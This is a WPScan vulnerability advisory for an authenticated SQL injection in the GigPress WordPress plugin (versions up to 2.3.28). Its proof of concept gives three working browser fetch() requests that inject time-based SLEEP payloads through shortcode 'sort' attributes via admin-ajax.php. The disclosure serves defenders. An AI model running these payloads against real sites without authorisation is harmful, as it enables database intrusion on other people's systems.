WordPress Plugin Vulnerabilities
GigPress <= 2.3.28 - Subscriber+ SQLi
Description
The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks
Proof of Concept
Run the below commands in the developer console of the web browser while being on the blog as a subscriber user and note the delayed responses
Via gigpress_menu shortcode, 5s delay
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=parse-media-shortcode&shortcode=[gigpress_menu sort=' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)']",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Via gigpress_shows shortcode, 3s delay
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=parse-media-shortcode&shortcode=[gigpress_shows group_artists='no' sort=' AND (SELECT 42 FROM (SELECT(SLEEP(1)))b)']",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Via gigpress_related_shows shortcode, 6s delay:
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=parse-media-shortcode&post_ID=1&shortcode=[gigpress_related_shows sort=' AND (SELECT 42 FROM (SELECT(SLEEP(2)))b)']",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Affects Plugins
No known fix References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-02-06 (about 1 years ago)
Added
2023-02-06 (about 1 years ago)
Last Updated
2023-02-06 (about 1 years ago)
WPScan 